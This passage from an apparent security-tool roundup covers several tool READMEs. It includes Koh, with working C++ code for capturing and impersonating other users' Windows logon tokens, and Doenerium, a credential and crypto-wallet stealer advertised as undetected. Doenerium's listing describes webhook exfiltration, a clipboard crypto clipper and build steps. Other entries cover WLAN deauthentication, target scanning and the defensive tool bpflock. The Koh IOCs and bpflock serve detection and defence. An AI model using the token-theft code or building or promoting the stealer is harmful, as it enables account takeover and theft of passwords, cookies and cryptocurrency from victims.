    • Unfortunately this misses newly created local sessions and incoming sessions created from things like PSEXEC.
  3. On a new logon session, open up a handle to every reachable process and enumerate all existing handles, cloning the token linked to the new logon session.
    • This requires opening up lots of processes/handles, which looks very suspicious.
  4. The AcquireCredentialsHandle()/InitializeSecurityContext()/AcceptSecurityContext() approach described below, which is what we went with.

Our Approach

The SSPI AcquireCredentialsHandle() call has a pvLogonID field which states:

A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. 

Note: In order to utilize a logon session LUID with AcquireCredentialsHandle() you need SeTcbPrivilege, however this is usually easier to get than SeCreateTokenPrivilege.

Using this call while specifying a logon session ID/LUID appears to increase the ReferenceCount for the logon session structure, preventing it from being released. However, we're now presented with another problem: given a "leaked"/held-open logon session, how do we get a usable token from it? WTSQueryUserToken() only works with desktop sessions, and there's no userland API that we could find that lets you map a LUID to a usable token.

However we can use two additional SSPI functions, InitializeSecurityContext() and AcceptSecurityContext() to act as client and server to ourselves, negotiating a new security context that we can then use with QuerySecurityContextToken() to get a usable token. This was documented in KB180548 (mirrored by PKISolutions here) for the purposes of credential validation. This is a similar approach to Internal-Monologue, except we are completing the entire handshake process, producing a token, and then holding that for later use.
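
In rough outline, that client-and-server-to-ourselves dance looks like the C++ sketch below. This is a minimal sketch based on the KB180548 pattern rather than Koh's actual code: it assumes SeTcbPrivilege is already enabled, uses the Negotiate package, and omits CompleteAuthToken handling and most error checks.

#define SECURITY_WIN32
#include <windows.h>
#include <security.h>
#pragma comment(lib, "secur32.lib")

HANDLE TokenForLogonSession(LUID luid)
{
    wchar_t pkg[] = L"Negotiate";
    CredHandle credClient = {}, credServer = {};
    TimeStamp exp;

    // Client-side credentials bound to the target logon session via pvLogonID
    // (the call that needs SeTcbPrivilege and holds the session open).
    if (AcquireCredentialsHandleW(nullptr, pkg, SECPKG_CRED_OUTBOUND, &luid,
            nullptr, nullptr, nullptr, &credClient, &exp) != SEC_E_OK)
        return nullptr;

    // Server-side credentials so we can "accept" our own authentication.
    if (AcquireCredentialsHandleW(nullptr, pkg, SECPKG_CRED_INBOUND, nullptr,
            nullptr, nullptr, nullptr, &credServer, &exp) != SEC_E_OK)
        return nullptr;

    CtxtHandle ctxClient, ctxServer;
    BYTE bufC[16384], bufS[16384];
    SecBuffer secC = { sizeof(bufC), SECBUFFER_TOKEN, bufC };
    SecBuffer secS = { sizeof(bufS), SECBUFFER_TOKEN, bufS };
    SecBufferDesc outC = { SECBUFFER_VERSION, 1, &secC };
    SecBufferDesc outS = { SECBUFFER_VERSION, 1, &secS };
    PCtxtHandle pCtxC = nullptr, pCtxS = nullptr;
    PSecBufferDesc serverOut = nullptr;
    SECURITY_STATUS scC = SEC_I_CONTINUE_NEEDED, scS = SEC_I_CONTINUE_NEEDED;
    ULONG attrs = 0;
    TimeStamp ts;

    // Shuttle tokens between the "client" and "server" legs until both complete.
    while (scC == SEC_I_CONTINUE_NEEDED || scS == SEC_I_CONTINUE_NEEDED) {
        if (scC == SEC_I_CONTINUE_NEEDED) {
            secC.cbBuffer = sizeof(bufC);
            scC = InitializeSecurityContextW(&credClient, pCtxC, nullptr,
                    ISC_REQ_CONNECTION, 0, SECURITY_NATIVE_DREP, serverOut, 0,
                    &ctxClient, &outC, &attrs, &ts);
            pCtxC = &ctxClient;
        }
        if (scS == SEC_I_CONTINUE_NEEDED) {
            secS.cbBuffer = sizeof(bufS);
            scS = AcceptSecurityContext(&credServer, pCtxS, &outC,
                    ASC_REQ_CONNECTION, SECURITY_NATIVE_DREP,
                    &ctxServer, &outS, &attrs, &ts);
            pCtxS = &ctxServer;
            serverOut = &outS;
        }
    }
    if (scC != SEC_E_OK || scS != SEC_E_OK)
        return nullptr;

    // The completed server-side context yields a usable token for the session.
    HANDLE hToken = nullptr;
    QuerySecurityContextToken(&ctxServer, &hToken);
    return hToken;
}

The returned handle can then be held to keep the session alive and later passed to ImpersonateLoggedOnUser() or DuplicateTokenEx(), which is the "capture now, impersonate later" flow shown in the usage examples above.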

Filtering can then be done on the token itself, via CheckTokenMembership() or GetTokenInformation(). For example, we could release any tokens except for ones belonging to domain admins, or specific groups we want to target.
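
As a hedged illustration of that filtering idea (the helper below is ours, not a function from Koh):

#include <windows.h>
#include <sddl.h>
#pragma comment(lib, "advapi32.lib")

// Returns TRUE if the token contains the given group SID, e.g. pass the
// Domain Admins SID string to keep only DA tokens.
BOOL TokenHasGroup(HANDLE hToken, LPCWSTR sidString)
{
    PSID pSid = nullptr;
    BOOL isMember = FALSE;

    // Convert "S-1-5-21-..." into a binary SID.
    if (!ConvertStringSidToSidW(sidString, &pSid))
        return FALSE;

    // CheckTokenMembership expects an impersonation token, so duplicate first.
    HANDLE hImp = nullptr;
    if (DuplicateToken(hToken, SecurityImpersonation, &hImp)) {
        CheckTokenMembership(hImp, pSid, &isMember);
        CloseHandle(hImp);
    }

    LocalFree(pSid);
    return isMember;
}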

Advantages/Disadvantages Versus Traditional Credential Extraction

Advantages

  • Works for both local and inbound (non-network) logons.
  • Works for inbound sessions created via Kerberos and NTLM.
  • Doesn’t require opening up a handle to multiple processes.
  • Doesn't create a new logon event or logon session.
  • Doesn't create additional event logs on the DC outside of normal system ticket renewal behavior (I don't think?)
  • No default lifetime on the tokens (I don't think?) so access should work as long as the captured account’s credentials don't change and the system doesn’t reboot.
  • Reuses legitimate captured auth on a system, so should "blend with the noise" reasonably well.

Disadvantages

  • Access is only usable as long as the system doesn't reboot.
  • Doesn't let you reuse access on other systems
    • However, existing ticket/credential extraction can still be done using the leaked logon session.
  • May cause instability if a large number of sessions are leaked, though this can be mitigated with token group SID filtering and by restricting the maximum number of captured tokens (default of 1000 here).

The Inline Shenanigans Bug

I've been coding for a decent amount of time, and this is one of the weirder and more frustrating-to-track-down bugs I've hit in a while - please help me with this lol.

  • When the Koh.exe assembly is run from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run via Cobalt Strike's Beacon fork&run process with execute-assembly from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in a SYSTEM context, everything works properly.

  • However, if the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in an elevated, but not SYSTEM, context, the call to AcquireCredentialsHandle() fails with SEC_E_NO_CREDENTIALS and everything fails ¯\_(ツ)_/¯

We have tried (with no success):

  • Spinning off everything to a separate thread, specifying a STA thread apartment.
  • Trying to diagnose RPC weirdness (still more to investigate here).
  • Using DuplicateTokenEx and SetThreadToken instead of ImpersonateLoggedOnUser.
  • Checking if we have the proper SeTcbPrivilege right before the AcquireCredentialsHandle call (we do).

For all intents and purposes, the thread context right before the call to AcquireCredentialsHandle works in this context, but the result errors out. And we have no idea why.

If you have an idea of what this might be, please let us know! And if you want to try playing around with a simpler assembly, check out the AcquireCredentialsHandle repo on my GitHub for troubleshooting.

IOCs

To quote @tifkin_, "Everything is stealthy until someone is looking for it." While Koh's approach is slightly different from others, there are still IOCs that can be used to detect it.

The unique TypeLib GUID for the C# Koh collector is 4d5350c8-7f8c-47cf-8cde-c752018af17e as detailed in the Koh.yar Yara rule in this repo. If this is not changed on compilation, it should be a very high fidelity indicator of the Koh server.

When the Koh server starts, it opens a named pipe called \\.\pipe\imposecost that stays open as long as Koh is running. The default password used for Koh communication is password, so sending password to any \\.\pipe\imposecost pipe will let you confirm whether Koh is indeed running. The default impersonation pipe used is \\.\pipe\imposingcost.
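
A minimal sketch of that liveness check follows; it assumes nothing about Koh's pipe protocol beyond the shared password described above, so treat the reply handling as illustrative:

#include <windows.h>
#include <stdio.h>

int main()
{
    // Open the default Koh control pipe, if present on this host.
    HANDLE hPipe = CreateFileW(L"\\\\.\\pipe\\imposecost",
                               GENERIC_READ | GENERIC_WRITE, 0, nullptr,
                               OPEN_EXISTING, 0, nullptr);
    if (hPipe == INVALID_HANDLE_VALUE) {
        printf("pipe not present - Koh is probably not running here\n");
        return 1;
    }

    // Send the default shared password and see whether the server answers.
    const char pw[] = "password";
    DWORD n = 0;
    WriteFile(hPipe, pw, sizeof(pw) - 1, &n, nullptr);

    char reply[1024] = {};
    if (ReadFile(hPipe, reply, sizeof(reply) - 1, &n, nullptr))
        printf("got %lu bytes back - a Koh server appears to be listening\n", n);

    CloseHandle(hPipe);
    return 0;
}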

If Koh starts in an elevated context but not as SYSTEM, a handle/token clone of winlogon is used to perform a getsystem-type elevation.

I'm sure that no attackers will change the indicators mentioned above.

There are likely some RPC artifacts for the token capture that we're hoping to investigate. We will update this section of the README if we find any additional detection artifacts along these lines. Hooking some of the possibly-uncommon APIs used by Koh (LsaEnumerateLogonSessions, or the AcquireCredentialsHandle/InitializeSecurityContext/AcceptSecurityContext chain, particularly AcquireCredentialsHandle calls that specify a LUID) could be explored for effectiveness, but alas, I am not an EDR.

TODO

  • Additional testing in the lab and field. Possible concerns:
    • Stability in production environments, specifically intentional token leakage causing issues on highly-trafficked servers
    • Total actual effective token lifetime
  • "Remote" client that allows for monitoring through the Koh named pipe remotely
  • Implement more clients (PowerShell, C#, C++, etc.)
  • Fix the Inline Shenanigans Bug


Pinecone - A WLAN Red Team Framework



Pinecone is a WLAN network auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run on Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.

This tool is designed for educational and research purposes only. Only use it with explicit permission.


Installation

For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:

  • Python 3.5+. Your distribution probably comes with Python3 already installed, if not it can be installed using apt-get install python3.
  • dnsmasq (tested with version 2.76). Can be installed using apt-get install dnsmasq.
  • hostapd-wpe (tested with version 2.6). Can be installed using apt-get install hostapd-wpe. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.

After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt in the project root folder.

Usage

For starting Pinecone, execute python3 pinecone.py from within the project root folder:

root@kali:~/pinecone# python pinecone.py 
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >

Pinecone is controlled via a Metasploit-like command-line interface. You can type help to get the list of available commands, or help 'command' to get more information about a specific command:

pinecone > help

Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias

Undocumented commands:
======================
back run stop

pinecone > help use
Usage: use module [-h]

Interact with the specified module.

positional arguments:
module module ID

optional arguments:
-h, --help show this help message and exit

Use the command use 'moduleID' to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:

pinecone > use 
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >

Every module has options that can be seen by typing help run or run --help when a module is activated. Most modules have default values for their options (check them before running):

pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)

When a module is activated, you can use the run [options...] command to start its functionality. The modules provide feedback of their execution state:

pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...

If a module runs in the background (for example, scripts/infrastructure/ap), you can stop it using the stop command while it is running.

When you are done using a module, you can deactivate it by using the back command. You can also activate another module issuing the use command again.

Shell commands may be executed with the command shell or the ! shortcut:

pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md

Currently, Pinecone's reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs are stored in the tmp/ directory, also under the project root folder.




Cdb - Automate Common Chrome Debug Protocol Tasks To Help Debug Web Applications From The Command-Line And Actively Monitor And Intercept HTTP Requests And Responses



Pown CDB is a Chrome Debug Protocol utility. The main goal of the tool is to automate common tasks to help debug web applications from the command-line and actively monitor and intercept HTTP requests and responses. This is particularly useful during penetration tests and other types of security assessments and investigations.


Credits

This tool is part of secapps.com open-source initiative.

  ___ ___ ___   _   ___ ___  ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com

Authors

Quickstart

This tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.

Install Pown first as usual:

$ npm install -g pown@latest

Invoke directly from Pown:

$ pown cdb

Library Use

Install this module locally from the root of your project:

$ npm install @pown/cdb --save

Once done, invoke pown cli:

$ POWN_ROOT=. ./node_modules/.bin/pown-cli cdb

You can also use the global pown to invoke the tool locally:

$ POWN_ROOT=. pown cdb

Usage

WARNING: This pown command is currently under development and as a result will be subject to breaking changes.

pown cdb <command>

Chrome Debug Protocol Tool

Commands:
pown cdb launch Launch server application such as chrome, firefox, opera and edge [aliases: start]
pown cdb navigate <url> Go to the specified url [aliases: goto, go]
pown cdb network Chrome Debug Protocol Network Monitor [aliases: net, sniff, proxy, mon, monitor]
pown cdb cookies Dump current page cookies [aliases: cookie]
pown cdb screenshot <file> Screenshot the current page [aliases: capture, shoot, shot]

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown cdb launch

pown cdb launch

Launch server application such as chrome, firefox, opera and edge

Options:
--version Show version number [boolean]
--help Show help [boolean]
--port, -p Remote debugging port [number] [default: 9222]
--xss-auditor, -x Turn on/off XSS auditor [boolean] [default: true]
--certificate-errors, -c Turn on/off certificate errors [boolean] [default: true]
--pentest, -t Start with prefered settings for pentesting [boolean] [default: false]

pown cdb navigate

pown cdb network
pown cdb cookies
pown cdb screenshot
Tutorials

Web Application Security Assessment

Let's explore how to use Pown CDB during a typical web app security engagement.

First, ensure that you have the latest pown installed:

$ npm install -g pown

If you have pown installed, make sure you have the latest version:

$ pown update

To get started with Pown CDB we need a Chrome browser instance (other browsers are also supported) with chrome debug remote interface enabled and listening on localhost:

$ pown cdb launch --port 9333

Once the chrome browser instance is running, hook it with pown cdb network utility:

$ pown cdb network --port 9333 -b

The -b flag is used to start Pown CDB with a curses-based user interface:


Use key-combo shift + ? to get a list of available shortcuts:


As soon as you start using the browser, Pown CDB will record and display the traffic in the user interface. To intercept requests use key-combo ctrl + t.


Requests are captured and opened in your default shell editor ($EDITOR). Make the desired changes, save and quit. The original request will be replaced with your changes.



RESim - Reverse Engineering Software Using A Full System Simulator



Reverse engineering using a full system simulator.

  • Dynamic analysis by instrumenting simulated hardware using Simics
  • Trace process trees, system calls and individual programs
  • Reverse execution to selected breakpoints and events
  • Integrated with IDA Pro(tm) debugging client
  • Fuzz with a customized AFL, injecting directly into simulated memory

RESim is a dynamic system analysis tool that provides detailed insight into processes, programs and data flow within networked computers. RESim simulates networks of computers through use of the Simics[1] platform's high-fidelity models of processors, peripheral devices (e.g., network interface cards), and disks. The networked simulated computers load and run targeted software copied from images extracted from the physical systems being modeled.

Broadly, RESim aids reverse engineering and vulnerability analysis of networks of Linux-based systems by inventorying processes in terms of the programs they execute and the data they consume. Data sources include files, device interfaces and inter-process communication mechanisms. Process execution and data consumption is documented through dynamic analysis of a running simulated system without installation or injection of software into the simulated system, and without detailed knowledge of the kernel hosting the processes.

RESim also provides interactive visibility into individual executing programs through use of a custom plug-in to the IDA Pro disassembler/debugger. The disassembler/debugger allows setting breakpoints to pause the simulation at selected events in either future time, or past time. For example, RESim can direct the simulation state to reverse until the most recent modification of a selected memory address.
Reloadable checkpoints may be generated at any point during system execution.
A RESim simulation can be paused for inspection, e.g., when a specified process is scheduled for execution, and subsequently continued, potentially with altered memory or register state. The analyst can explicitly modify memory or register content, and can also dynamically augment memory based on system events, e.g., change a password file entry when read by the su program.

Analysis is performed entirely through observation of the simulated target system’s memory and processor state, without need for shells, software injection, or kernel symbol tables. The analysis is said to be external because the analysis observation functions have no effect on the state of the simulated system.

RESim has been integrated with the American Fuzzy Lop (AFL) fuzzer. This fuzzing system injects fuzzed data directly into the application's read buffer, simplifying the fuzzing setup and workflow. RESim automatically replays and analyzes any detected crashes, identifying the causes of crashes, e.g., corruption of execution control.

Please refer to the RESim User's Guide for additional information. A brief demonstration of RESim can be seen here: (https://nps.box.com/s/rf3n104ualg38pon6b7fm6m6wqk9zz50)

RESim is based on a software vetting and forensic analysis platform created for the DARPA Cyber Grand Challenge. That repo is here: https://github.com/mfthomps/cgc-monitor. A paper describing that work is at https://www.sciencedirect.com/science/article/pii/S1742287618301920 And a fine summary of the use of Simics in the CGC Monitor is at https://software.intel.com/content/www/us/en/develop/blogs/simics-software-automates-cyber-grand-challenge-validation.html

[1]Simics is a full system simulator sold by Wind River, which holds all relevant trademarks.



LiveTargetsFinder - Generates Lists Of Live Hosts And URLs For Targeting, Automating The Usage Of MassDNS, Masscan And Nmap To Filter Out Unreachable Hosts And Gather Service Information



Generates lists of live hosts and URLs for targeting, automating the usage of Massdns, Masscan and nmap to filter out unreachable hosts

Given an input file of domain names, this script will automate the usage of MassDNS to filter out unresolvable hosts, and then pass the results on to Masscan to confirm that the hosts are reachable and on which ports. The script will then generate a list of full URLs to be used for further targeting (passing into tools like gobuster or dirsearch, or making HTTP requests), a list of reachable domain names, and a list of reachable IP addresses. As an optional last step, you can run an nmap version scan on this reduced host list, verifying that the earlier reachable hosts are up, and gathering service information from their open ports.


Overview

This script is especially useful for large domain sets, such as subdomain enumerations gathered from an apex domain with thousands of subdomains. With these large lists, an nmap scan would simply take too long. The goal here is to first use the less accurate, but much faster, MassDNS to quickly reduce the size of your input list by removing unresolvable domains. Then, Masscan will be able to take the output from MassDNS, and further confirm that the hosts are reachable, and on which ports. The script will then parse these results and generate lists of the live hosts discovered.

Now, the list of hosts should be reduced enough to be suitable for further scanning/testing. If you want to go a step further, you can tell the script to run an nmap scan on the list of reachable hosts, which should take a more reasonable amount of time with the shorter list of hosts. After running nmap, any false positives given by Masscan will be filtered out. Raw nmap output will be stored in the regular nmap XML format, and additional information from the version detection will be added to a SQLite database.

Installation

If using the nmap scan option, this tool assumes that you already have nmap installed

Note: Running the install script is only needed if you do not already have MassDNS and Masscan installed, or if you would like to reinstall them inside this repo. If you do not run the script, you can provide the paths to the respective executables as arguments. The script additionally expects that the resolvers list included with MassDNS be located at {massDNS_directory}/lists/resolvers.txt.

git clone https://github.com/allyomalley/LiveTargetsFinder.git
cd LiveTargetsFinder
sudo pip3 install -r requirements.txt

(OPTIONAL)

chmod +x install_deps.sh
./install_deps.sh

If you do not already have MassDNS and Masscan installed, and would prefer to install them yourself, see the documentation for instructions:

MassDNS

Masscan

I have only tested this script on macOS and Linux - the python script itself should work on a Windows machine, though I believe the installation for MassDNS and Masscan will differ.

Usage

python3 liveTargetsFinder.py [domainList] [options]
  • --target-list : Input file containing the list of domains, e.g. google.com (required)
  • --massdns-path : Path to the MassDNS executable, if non-default (default: ./massdns/bin/massdns)
  • --masscan-path : Path to the Masscan executable, if non-default (default: ./masscan/bin/masscan)
  • --nmap : Run an nmap version detection scan on the gathered live hosts (default: disabled)
  • --db-path : If using the --nmap option, supply the path to the database you would like to append to; it will be created if it does not exist (default: output/liveTargetsFinder.sqlite3)
  • Note that the Masscan and MassDNS settings are hardcoded inside liveTargetsFinder.py. Feel free to edit them (lines 87 + 97).
  • Since this tool was designed with very large lists in mind, I tweaked many of the settings to try to balance speed, accuracy, and network constraints - these can all be adjusted to suit your needs and bandwidth.
  • Default settings for Masscan only scan ports 80 and 443.
    • -s, (--hashmap-size) in particular was chosen for performance reasons - you will likely be able to increase this.
    • Full MassDNS arguments:
      • -c 25 -o J -r ./massdns/lists/resolvers.txt -s 100 -w massdnsOutput -t A targetHosts
      • Documentation
  • Another setting of note is the --max-rate argument for Masscan - you will likely want to adjust this.
    • Full Masscan arguments:
      • -iL ipFile -oD masscanOutput --open-only --max-rate 5000 -p80,443 --max-retries 10
      • Documentation
  • Default nmap settings only scan ports 80 and 443, with timing -T4 and a few NSE scripts.
    • Full nmap arguments:
      • --script http-server-header.nse,http-devframework.nse,http-headers -sV -T4 -p80,443 -oX {output.xml}

Example

Did run install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt

Did NOT run the install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt --massdns-path ../massdns/bin/massdns --masscan-path ../masscan/bin/masscan 

Perform an nmap scan and write to/append to the default DB path (liveTargetsFinder.sqlite3)

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap

Perform an nmap scan and write to/append to the specified database

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap --db-path serviceinfo_victim.sqlite3

Output

Input: victimDomains.txt

  • output/victimDomains_targetUrls.txt : List of reachable, live URLs (e.g. https://github.com, http://github.com)
  • output/victimDomains_domains_alive.txt : List of live domain names (e.g. github.com, google.com)
  • output/victimDomains_ips_alive.txt : List of live IP addresses (e.g. 10.1.0.200, 52.3.1.166)
  • Supplied or default DB path : SQLite database storing live hosts and information about their running services
  • output/victimDomains_massdns.txt : The raw output from MassDNS, in ndjson format
  • output/victimDomains_masscan.txt : The raw output from Masscan, in ndjson format
  • output/victimDomains_nmap.txt : The raw output from nmap, in XML format


modDetective - Tool That Chronologizes Files Based On Modification Time In Order To Investigate Recent System Activity



modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTF's in order to pinpoint where escalation and attack vectors may exist.



To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).

What is modDetective Doing?

modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT for the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification times of each file, then orders these modification times in order to output them chronologically.

Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "Indicators of User Activity," since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.

Requirements

modDetective currently works only with python3; python2 compatibility will be completed shortly (hence the lack of f-strings). Standard libraries should be fine.



Doenerium - Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)


Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

Features

Stealer

  • Discord Token
  • Discord Info - Username, Phone number, Email, Billing, Nitro Status & Backup Codes
  • Discord Friends with rare badges
  • Grabs crypto wallets
    • Zcash
    • Armory
    • Bytecoin
    • Jaxx
    • Exodus
    • Ethereum
    • Electrum
    • AtomicWallet
    • Guarda
    • Coinomi
  • Browser (Chrome, Opera, Firefox, OperaGX, Edge, Brave, Yandex) - Passwords, Cookies, Autofill & History (Searches for specific keywords such as PayPal, Coinbase etc. in them)
  • Screenshot(s)
  • Injects itself to discord to grab token when changed

 

Additional

  • Crypto Clipper - BTC, LTC, XMR, ETH, XRP, NEO, BCH, DOGE, DASH, XLM
  • Ultra Obfuscation (use https://obfuscator.io)
  • Anti-Debug
  • Anti-VM
  • Validates a found discord token and then sends it to your discord webhook
  • Sends all files to your discord webhook in beautiful embeds and a structured zip file

 

Screenshots









  Setting Up

Install Node.js

Install Visual Studio with the C++ compilers and everything enabled (it is a few gigabytes, but you won't have errors)

Run install.bat file to install all necessary files

Replace WEBHOOK with your webhook in config.js

Run build.bat and wait for doenerium-win.exe to be built.

Todo

  • Exodus wallet injection (get the password whenever the user logs in the wallet)
  • More grabbers (VPN's, Gaming, Messengers)
  • Keylogger
  • Growtopia stealer
  • Discord bot to build within discord ($build <webhook_url>)
  • Dynamic encryption

License

By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info see commonsclause

Note

There is no official telegram server of this project. I don't own t.me/doenerium

I am not responsible for any damages this software may cause. This was made for personal education.

Credits

Credits to Pandoric / PandoricGalaxy for creating this beautiful README file



Bpflock - eBPF Driven Security For Locking And Auditing Linux Machines



bpflock - eBPF driven security for locking and auditing Linux machines.

Note: bpflock is currently in experimental stage, it may break, options and security semantics may change, some BPF programs will be updated to use Cilium ebpf library.


1. Introduction

bpflock uses eBPF to strengthen Linux security. By restricting access to a wide range of Linux features, bpflock is able to reduce the attack surface and block some well-known attack techniques.

Only programs like container managers, systemd, and other containers/programs that run in the host pid and network namespaces are allowed access to full Linux features; containers and applications that run in their own namespaces will be restricted. If bpflock bpf programs run under the restricted profile, then all programs/containers, including privileged ones, will have their access denied.

bpflock protects Linux machines by taking advantage of multiple security features including Linux Security Modules + BPF.

Architecture and Security design notes:

  • bpflock is not a mandatory access control labeling solution, and it does not intend to replace AppArmor, SELinux, and other MAC solutions. bpflock uses a simple declarative security profile.
  • bpflock offers multiple small bpf programs that can be reused in multiple contexts from Cloud Native deployments to Linux IoT devices.
  • bpflock is able to restrict root from accessing certain Linux features, however it does not protect against evil root.

2. Functionality Overview

2.1 Security features

bpflock offers multiple security protections.

2.2 Semantics

bpflock keeps the security semantics simple. It supports three global profiles to broadly cover the security spectrum, and restricts access to specific Linux features.

  • profile: this is the global profile that can be applied per bpf program; it takes one of the following:

    • allow|none|privileged : these are equivalent and define the least secure profile. In this profile access is logged and allowed for all processes. Useful for logging security events.
    • baseline : restrictive profile where access is denied for all processes, except privileged applications and containers that run in the host namespaces, or per cgroup allowed profiles in the bpflock_cgroupmap bpf map.
    • restricted : heavily restricted profile where access is denied for all processes.
  • Allowed or blocked operations/commands:

    Under the allow|privileged or baseline profiles, a list of allowed or blocked commands can be specified and will be applied.

    • --protection-allow : comma-separated list of allowed operations. Valid under the baseline profile, this is useful for applications that are too specific and perform privileged operations. It reduces the need for the allow|privileged profile: instead of using the privileged profile, we can specify the baseline one and add a set of allowed commands, offering a case-by-case definition for such applications.
    • --protection-block : comma-separated list of blocked operations. Valid under the allow|privileged and baseline profiles, it allows restricting access to some features without using the full restricted profile that might break some specific applications. Using the baseline or privileged profiles opens the gate to most Linux features, but with the --protection-block option some of this access can be blocked.

For bpf security examples check bpflock configuration examples

3. Deployment

3.1 Prerequisites

bpflock needs the following:

  • Linux kernel version >= 5.13 with the following configuration:

    Obviously a BTF enabled kernel.

    Enable BPF LSM support

    Check /boot/config-* to confirm whether your kernel was compiled with CONFIG_BPF_LSM=y. If BPF LSM is not enabled, running bpflock fails with:

    must have a kernel with 'CONFIG_BPF_LSM=y' 'CONFIG_LSM=\"...,bpf\"'"

    To enable BPF LSM, as an example on Ubuntu:

    1. Open the /etc/default/grub file as privileged of course.
    2. Append the following to the GRUB_CMDLINE_LINUX variable and save.
      "lsm=lockdown,capability,yama,apparmor,bpf"
      or
      GRUB_CMDLINE_LINUX="lsm=lockdown,capability,yama,apparmor,bpf"
    3. Update grub config with:
      sudo update-grub2
    4. Reboot into your kernel.

3.2 Docker deployment

To run using the default allow or privileged profile (the least secure profile):

docker run --name bpflock -it --rm --cgroupns=host \
--pid=host --privileged \
-v /sys/kernel/:/sys/kernel/ \
-v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

Fileless Binary Execution

To log and restrict fileless binary execution run with:

docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
-e "BPFLOCK_FILELESSLOCK_PROFILE=restricted" \
-v /sys/kernel/:/sys/kernel/ \
-v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

When running under the restricted profile, the container logs will display the blocked operations.

Running under the restricted profile may break things, this is why the default profile is allow.

Kernel Modules Protection

To apply Kernel Modules Protection run with environment variable BPFLOCK_KMODLOCK_PROFILE=baseline or BPFLOCK_KMODLOCK_PROFILE=restricted:

docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
-e "BPFLOCK_KMODLOCK_PROFILE=restricted" \
-v /sys/kernel/:/sys/kernel/ \
-v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

Example:

$ sudo unshare -p -n -f
# modprobe xfs
modprobe: ERROR: could not insert 'xfs': Operation not permitted

Kernel Image Lock-down

To apply Kernel Image Lock-down run with environment variable BPFLOCK_KIMGLOCK_PROFILE=baseline:

docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
-e "BPFLOCK_KIMGLOCK_PROFILE=baseline" \
-v /sys/kernel/:/sys/kernel/ \
-v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

$ sudo unshare -f -p -n bash
# head -c 1 /dev/mem
head: cannot open '/dev/mem' for reading: Operation not permitted

BPF Protection

To apply bpf restriction run with environment variable BPFLOCK_BPFRESTRICT_PROFILE=baseline or BPFLOCK_BPFRESTRICT_PROFILE=restricted:

docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
-e "BPFLOCK_BPFRESTRICT_PROFILE=baseline" \
-v /sys/kernel/:/sys/kernel/ \
-v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

Example running in different pid and network namespaces and using bpftool:

$ sudo unshare -f -p -n bash
# bpftool prog
Error: can't get next program: Operation not permitted

Running with the -e "BPFLOCK_BPFRESTRICT_PROFILE=restricted" profile will deny bpf for all.

3.3 Configuration and Environment file

Passing configuration as bind mounts can be achieved using the following command.

Assuming the bpflock.yaml and bpf.d profile configs are in a bpflock directory inside the current directory, we can just use:

ls bpflock/
bpf.d bpflock.d bpflock.yaml

docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
-v $(pwd)/bpflock/:/etc/bpflock \
-v /sys/kernel/:/sys/kernel/ \
